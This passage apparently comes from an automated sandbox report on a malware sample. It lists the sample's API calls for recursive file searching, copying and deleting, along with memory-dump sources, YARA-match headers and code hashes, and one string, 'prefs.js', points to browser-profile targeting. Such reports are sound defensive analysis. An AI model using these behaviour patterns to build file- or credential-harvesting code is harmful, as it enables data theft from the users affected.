                      • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                      • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                      • FindClose.KERNEL32(000000FF), ref: 00414B92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$%s\%s$%s\*
                      • API String ID: 180737720-445461498
                      • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                      • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                      • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                      • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                      APIs
                      • wsprintfA.USER32 ref: 04113B33
                      • FindFirstFileA.KERNEL32(?,?), ref: 04113B4A
                      • lstrcat.KERNEL32(?,?), ref: 04113B9C
                      • StrCmpCA.SHLWAPI(?,00420F70), ref: 04113BAE
                      • StrCmpCA.SHLWAPI(?,00420F74), ref: 04113BC4
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 04113ECE
                      • FindClose.KERNEL32(000000FF), ref: 04113EE3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                      • String ID:
                      • API String ID: 1125553467-0
                      • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                      • Instruction ID: 90d105ea2eaedb7a4b227c75af28cc0bb63fad2ff6df33b76c48f3b682cce819
                      • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                      • Instruction Fuzzy Hash: 9FA161B5A4021CABEB34DFA4CCC4FEE7379BB49300F044599A50D96190EB75AB84CF62
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                      • HeapAlloc.KERNEL32(00000000), ref: 00414587
                      • wsprintfA.USER32 ref: 004145A6
                      • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                      • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                      • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                      • FindClose.KERNEL32(000000FF), ref: 004146A0
                      • lstrcatA.KERNEL32(?,0251D020,?,00000104), ref: 004146C5
                      • lstrcatA.KERNEL32(?,0254D7B0), ref: 004146D8
                      • lstrlenA.KERNEL32(?), ref: 004146E5
                      • lstrlenA.KERNEL32(?), ref: 004146F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                      • String ID: %s\%s$%s\*
                      • API String ID: 13328894-2848263008
                      • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                      • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                      • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                      • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                      APIs
                      • wsprintfA.USER32 ref: 04114B93
                      • FindFirstFileA.KERNEL32(?,?), ref: 04114BAA
                      • StrCmpCA.SHLWAPI(?,00420FDC), ref: 04114BD8
                      • StrCmpCA.SHLWAPI(?,00420FE0), ref: 04114BEE
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 04114DE4
                      • FindClose.KERNEL32(000000FF), ref: 04114DF9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID:
                      • API String ID: 180737720-0
                      • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                      • Instruction ID: 0424410f316e4c4491e741c18ca3fbf390b6966872d0f013f3da476f24d382f3
                      • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                      • Instruction Fuzzy Hash: 996188B5540218BBDB24EFE0DD84FEA73BDFB49700F00859CA50992150EB75A745CF95
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                      • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0410C15C
                      • StrCmpCA.SHLWAPI(?,004213F8), ref: 0410C1B4
                      • StrCmpCA.SHLWAPI(?,004213FC), ref: 0410C1CA
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0410CA26
                      • FindClose.KERNEL32(000000FF), ref: 0410CA38
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                      • Instruction ID: aea902c06d11dd43864f43219f1de3e8e5c79cfdf163b8f6a2307298d53f920d
                      • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                      • Instruction Fuzzy Hash: 9E426372A01144ABDB18FBB0DDD5EED7B79AF94344F40816DA50A960A0EF34BB48CF91
                      APIs
                      • wsprintfA.USER32 ref: 00413EC3
                      • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                      • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                      • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                      • FindClose.KERNEL32(000000FF), ref: 00414081
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s
                      • API String ID: 180737720-4073750446
                      • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                      • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                      • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                      • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 041147E7
                      • RtlAllocateHeap.NTDLL(00000000), ref: 041147EE
                      • wsprintfA.USER32 ref: 0411480D
                      • FindFirstFileA.KERNEL32(?,?), ref: 04114824
                      • StrCmpCA.SHLWAPI(?,00420FC4), ref: 04114852
                      • StrCmpCA.SHLWAPI(?,00420FC8), ref: 04114868
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 041148F2
                      • FindClose.KERNEL32(000000FF), ref: 04114907
                      • lstrcat.KERNEL32(?,0064A524), ref: 0411492C
                      • lstrcat.KERNEL32(?,0064A22C), ref: 0411493F
                      • lstrlen.KERNEL32(?), ref: 0411494C
                      • lstrlen.KERNEL32(?), ref: 0411495D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                      • String ID:
                      • API String ID: 671575355-0
                      • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                      • Instruction ID: 1b4f3eb3cf710f67fef78583a52bdd9aa96657e9d83e6d47a1793d4a2f1f2228
                      • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                      • Instruction Fuzzy Hash: 8E5194B5580218ABDB24EBB0DCC8FED737DAB58700F4045D8E60992190EB75AB84CF96
                      APIs
                      • wsprintfA.USER32 ref: 0411412A
                      • FindFirstFileA.KERNEL32(?,?), ref: 04114141
                      • StrCmpCA.SHLWAPI(?,00420FAC), ref: 0411416F
                      • StrCmpCA.SHLWAPI(?,00420FB0), ref: 04114185
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 041142D3
                      • FindClose.KERNEL32(000000FF), ref: 041142E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID:
                      • API String ID: 180737720-0
                      • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                      • Instruction ID: 28718a0f7d14658494dd1e0aafb2e98f308caf380d78265841515b732cf67892
                      • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                      • Instruction Fuzzy Hash: F95173B5900218BBDB24FBF0DDC4EEA737DBB44704F0085D9A64992090EB75A7858F95
                      APIs
                      • wsprintfA.USER32 ref: 0040ED3E
                      • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                      • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                      • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                      • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\*.*
                      • API String ID: 180737720-1013718255
                      • Opcode ID: 350b4ce3047616a6e9d96c88e7f1a14f14d7419869a4133133cec3c4f4a1d8f7
                      • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                      • Opcode Fuzzy Hash: 350b4ce3047616a6e9d96c88e7f1a14f14d7419869a4133133cec3c4f4a1d8f7
                      • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                      • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                      • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                      • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                      • String ID: 4@$\*.*
                      • API String ID: 2325840235-1993203227
                      • Opcode ID: 78ebc06c1a1e2a0806457f6188fe97af41bbf4358b928b2a983fd16535e92756
                      • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                      • Opcode Fuzzy Hash: 78ebc06c1a1e2a0806457f6188fe97af41bbf4358b928b2a983fd16535e92756
                      • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                      • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                      • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                      • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: prefs.js
                      • API String ID: 3334442632-3783873740
                      • Opcode ID: c14d5d7838a69f69677329ccf267c38847b32738c857b780e0a0ebecf911990d
                      • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                      • Opcode Fuzzy Hash: c14d5d7838a69f69677329ccf267c38847b32738c857b780e0a0ebecf911990d
                      • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,00401F2C,?,004251BC,?,?,00000000,?,00000000), ref: 00401923
                      • StrCmpCA.SHLWAPI(?,00425264), ref: 00401973
                      • StrCmpCA.SHLWAPI(?,0042530C), ref: 00401989
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                      • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                      • FindClose.KERNEL32(000000FF), ref: 00401E32
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 1415058207-1173974218
                      • Opcode ID: 0447b2ca11eddc2e9cba18a5a191011407d93c93bc384b39be87e0f81e467d3d
                      • Instruction ID: fa2d6fe3b05614b5a30e4509255bbbb1abe281ca63e4f804ed0983082d36a12e
                      • Opcode Fuzzy Hash: 0447b2ca11eddc2e9cba18a5a191011407d93c93bc384b39be87e0f81e467d3d
                      • Instruction Fuzzy Hash: 681260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                      APIs
                      • wsprintfA.USER32 ref: 0410EFA5
                      • FindFirstFileA.KERNEL32(?,?), ref: 0410EFBC
                      • StrCmpCA.SHLWAPI(?,00421538), ref: 0410F012
                      • StrCmpCA.SHLWAPI(?,0042153C), ref: 0410F028
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0410F515
                      • FindClose.KERNEL32(000000FF), ref: 0410F52A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID:
                      • API String ID: 180737720-0
                      • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                      • Instruction ID: bc78ed0bacd7b3d054ef9f107f2c8d03d15e2c636e7d24221000b9df1480e581
                      • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                      • Instruction Fuzzy Hash: 14E1FF719122589AEB18FB60DDD1EEE7B39AF94244F4041E9B10E620A1EF707F89CF54
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                      • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                      • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                      • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: 9b2e02221ededd9c89037e70e54e4a2dbdeeb79041f26ba7602f89abde497b2e
                      • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                      • Opcode Fuzzy Hash: 9b2e02221ededd9c89037e70e54e4a2dbdeeb79041f26ba7602f89abde497b2e
                      • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0410DD52
                      • StrCmpCA.SHLWAPI(?,004214B4), ref: 0410DD9A
                      • StrCmpCA.SHLWAPI(?,004214B8), ref: 0410DDB0
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0410E033
                      • FindClose.KERNEL32(000000FF), ref: 0410E045
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                      • Instruction ID: 1932b6f4eec67ef422bb457ceb49b70e511ec6c23ff83872b2bd59e3d0520f29
                      • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                      • Instruction Fuzzy Hash: 1A919672A002049BDB14FBB0EED5DED7B79AF95344F00856DA40E96190FF74BB188B91
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0410F985
                      • StrCmpCA.SHLWAPI(?,004215BC), ref: 0410F9D6
                      • StrCmpCA.SHLWAPI(?,004215C0), ref: 0410F9EC
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0410FD18
                      • FindClose.KERNEL32(000000FF), ref: 0410FD2A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                      • Instruction ID: 1ae2ff20e9f81e0c2ea6a81d3b651c7d55ddad72a92c79f7cc2d88dd55f627c7
                      • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
